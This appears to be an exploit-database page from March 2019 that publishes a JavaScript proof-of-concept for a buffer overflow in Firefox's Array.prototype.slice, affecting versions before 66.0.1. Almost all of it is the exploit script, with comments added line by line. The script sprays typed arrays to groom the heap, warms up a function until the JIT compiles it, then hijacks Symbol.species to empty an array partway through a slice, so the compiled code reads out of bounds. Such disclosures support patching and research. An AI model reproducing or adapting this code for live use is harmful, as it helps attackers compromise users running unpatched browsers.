
Published on March 28th, 2019 📆 | 4593 Views ⚑


Firefox Array.prototype.slice Buffer Overflow



Firefox versions prior to 66.0.1 are affected by a buffer overflow in Array.prototype.slice; since the affected range ends at 66.0.1, updating to that release or later addresses the issue. The proof-of-concept below is a plain page script.

MD5 | 05b0051c9f42aaa5df708e6cd925a7ce

// Element count shared by every `victim`/`gvictim` array and by the number
// of x-properties put on `fake`; also sizes the Uint32Arrays in gc() (size * 2).
let size = 64;

// Implicit globals (never declared). `garr` keeps each batch of Uint32Arrays
// allocated by gc() reachable; `j` counts those batches. Note that gc()'s
// inner loop declares its own block-scoped `let j`, which shadows this one
// only inside that loop.
garr = [];
j = 0;
// Allocates 0x20000 Uint32Array buffers of size * 2 elements, writes the
// alternating 32-bit constants 0x12345678 / 0xfffe0123 into each, and keeps
// the whole batch reachable via garr[j] (the global j, incremented per call).
// Nothing here invokes a collector directly; presumably the allocation
// volume is meant to provoke one — not verifiable from the listing.
function gc(){
var tmp = [];
for(let i = 0;i < 0x20000;i++){
tmp[i] = new Uint32Array(size * 2);
// This `j` is block-scoped to the loop and unrelated to the global `j`.
for(let j = 0;j < (size*2);j+=2){
tmp[i][j] = 0x12345678;
tmp[i][j+1] = 0xfffe0123;
}
}
garr[j++] = tmp;
}

// The array that jit() slices. Its `constructor` is reassigned to `obj` after
// the warm-up loop so that slice() consults obj[Symbol.species].
let arr = [{},2.2];

let obj = {};

// Installed as arr.constructor at the end of the script. Array.prototype.slice
// looks up constructor[Symbol.species] to create its result array, so this
// function runs in the middle of arr.slice(). It empties `victim` and every
// gvictim entry, drops the gvictim references, triggers the large allocation
// in gc(), and returns [1.1] as the array slice() then populates.
obj[Symbol.species] = function(){
victim.length = 0x0;
for(let i = 0;i < 0x2000;i++){
gvictim[i].length = 0x0;
gvictim[i] = null;
}
gc();
// Left commented out by the author; garr[0][0x10000] would be the
// 0x10001st Uint32Array from the first gc() batch.
//Array.isArray(garr[0][0x10000]);
return [1.1];
}

// First batch of 0x1000 filler arrays, each built the same way as `victim`
// below: a two-element literal grown to `size` (64) slots, then fill(3.3)
// overwrites every slot, so each holds 64 doubles equal to 3.3.
let gvictim = [];

for(let i = 0;i < 0x1000;i++){
gvictim[i] = [1.1,2.2];
gvictim[i].length = size;
gvictim[i].fill(3.3);
}





// The array read in jit() and emptied by the species callback. It is built
// between the two gvictim batches with the identical shape; the ordering is
// presumably meant to influence where the engine places it — not verifiable
// from the listing.
let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);

// Second batch, gvictim[0x1000..0x1fff], same construction as the first.
for(let i = 0x1000;i < 0x2000;i++){
gvictim[i] = [1.1,2.2];
gvictim[i].length = size;
gvictim[i].fill(3.3);
}

// Never called anywhere in the listing. Only used as an ordinary object that
// receives the 64 numeric properties x0..x63 assigned in the loop below;
// jit() contains a commented-out write to fake.x2.
function fake(arg){
}
// Gives `fake` the properties x0 … x63 (one per `size` slot), each set to 2.2.
for(let i = 0;i < size;i++){
fake["x"+i.toString()] = 2.2;
}

// Hot function: the loop below calls it 0x10000 times so the engine compiles
// it (hence the name), then it is called once more after arr.constructor has
// been redirected. While arr.constructor is the built-in Array the slice
// completes normally and victim[2] is 3.3; once it points at obj, the slice
// runs the species callback, which sets victim.length to 0 before victim[2]
// is read on the last line.
function jit(){
victim[1] = 1.1;
arr.slice();
// Leftover from the author; not executed.
//fake.x2 = 6.17651672645e-312;
return victim[2];
}

// Implicit global, assigned once and never read anywhere in the script.
flag = 0;

// Warm-up: call jit() 0x10000 times while arr.constructor is still the
// built-in Array, so each slice() completes normally and jit() returns
// victim[2] (3.3). `xx` is an implicit global that just receives the value.
for(let i = 0;i < 0x10000;i++){
xx = jit();
}

// From here on, arr.slice() resolves its species constructor through obj
// and therefore runs the callback defined above mid-slice.
arr.constructor = obj;

// Result is discarded; the call itself is the only effect.
Array.isArray(victim);
// Marker shown just before the final call.
alert(333);
// Final call: the slice inside jit() now empties `victim` before victim[2]
// is read. Interpreted semantics would yield undefined here; whether the
// compiled code still reads past the new length (the advisory's buffer
// overflow) is not verifiable from the listing.
alert(jit());





